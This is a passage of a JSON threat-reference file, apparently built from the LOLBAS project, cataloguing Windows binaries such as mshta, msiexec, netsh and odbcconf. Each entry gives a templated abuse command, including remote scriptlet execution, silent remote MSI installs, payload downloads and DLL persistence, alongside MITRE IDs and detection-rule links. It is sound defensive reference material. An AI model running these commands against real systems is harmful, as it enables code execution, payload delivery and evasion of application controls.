type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"]},{"id":"lolbas:mshta-exe:1","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mshta.exe vbscript:Close(Execute(\"GetObject(\"\"script:{REMOTEURL:.sct}\"\")\"))","description":"Executes VBScript supplied as a command line argument.","usecase":"Execute code","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"]},{"id":"lolbas:mshta-exe:2","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mshta.exe javascript:a=GetObject(\"script:{REMOTEURL:.sct}\").Exec();close();","description":"Executes JavaScript supplied as a command line argument.","usecase":"Execute code","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"]},{"id":"lolbas:mshta-exe:3","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"mshta.exe \"{PATH_ABSOLUTE}:file.hta\"","description":"Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.","usecase":"Execute code hidden in alternate data stream","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"]},{"id":"lolbas:mshta-exe:4","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"mshta.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"]},{"id":"lolbas:msiexec-exe:0","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /quiet /i {PATH:.msi}","description":"Installs the target .MSI file silently.","usecase":"Execute custom made msi file with attack code","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"]},{"id":"lolbas:msiexec-exe:1","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /q /i {REMOTEURL}","description":"Installs the target remote & renamed .MSI file silently.","usecase":"Execute custom made msi file with attack code from remote server","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"]},{"id":"lolbas:msiexec-exe:2","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /y {PATH_ABSOLUTE:.dll}","description":"Calls DllRegisterServer to register the target DLL.","usecase":"Execute dll files","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"]},{"id":"lolbas:msiexec-exe:3","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /z {PATH_ABSOLUTE:.dll}","description":"Calls DllUnregisterServer to un-register the target DLL.","usecase":"Execute dll files","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"]},{"id":"lolbas:msiexec-exe:4","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS=\"{REMOTEURL:.mst}\" /qb","description":"Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.","usecase":"Install trusted and signed msi file, with additional attack code as transformation file, from a remote server","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"]},{"id":"lolbas:msoxmled-exe:0","toolId":"lolbas:msoxmled-exe","toolName":"msoxmled.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msoxmled.exe /verb open {REMOTEURL}","description":"Downloads payload from remote server using the Microsoft Office XML Editor.","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\msoxmled.exe","C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE14\\msoxmled.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`msoxmled.exe` making network connections to external URLs"},{"type":"IOC","value":"Unexpected file downloads initiated by `msoxmled.exe`"},{"type":"IOC","value":"Event ID 1 with Image: `msoxmled.exe` and CommandLine: `/verb open`"}],"references":["https://learn.microsoft.com/en-us/answers/questions/4805030/where-is-msoxmled-exe-for-office-professional-2013","https://lolbas-project.github.io/lolbas/Binaries/msoxmled/"]},{"id":"lolbas:netsh-exe:0","toolId":"lolbas:netsh-exe","toolName":"Netsh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"netsh.exe add helper {PATH_ABSOLUTE:.dll}","description":"Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called","usecase":"Proxy execution of .dll","mitre":["T1546.007"],"privilege":"admin","fullPath":["C:\\WINDOWS\\System32\\Netsh.exe","C:\\WINDOWS\\SysWOW64\\Netsh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/deprecated/processes_created_by_netsh.yml"},{"type":"IOC","value":"Netsh initiating a network connection"}],"references":["https://freddiebarrsmith.com/trix/trix.html","https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html","https://liberty-shell.com/sec/2018/07/28/netshlep/","https://lolbas-project.github.io/lolbas/Binaries/Netsh/"]},{"id":"lolbas:ngen-exe:0","toolId":"lolbas:ngen-exe","toolName":"Ngen.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ngen.exe {REMOTEURL}","description":"Downloads payload from remote server using the Microsoft Native Image Generator utility.","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe"],"toolType":"Binary","references":["https://lolbas-project.github.io/lolbas/Binaries/Ngen/"]},{"id":"lolbas:odbcconf-exe:0","toolId":"lolbas:odbcconf-exe","toolName":"Odbcconf.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}}","description":"Execute DllRegisterServer from DLL specified.","usecase":"Execute a DLL file using technique that can evade defensive counter measures","mitre":["T1218.008"],"privilege":"user","fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b","https://github.com/woanware/application-restriction-bypasses","https://www.hexacorn.com/blog/2020/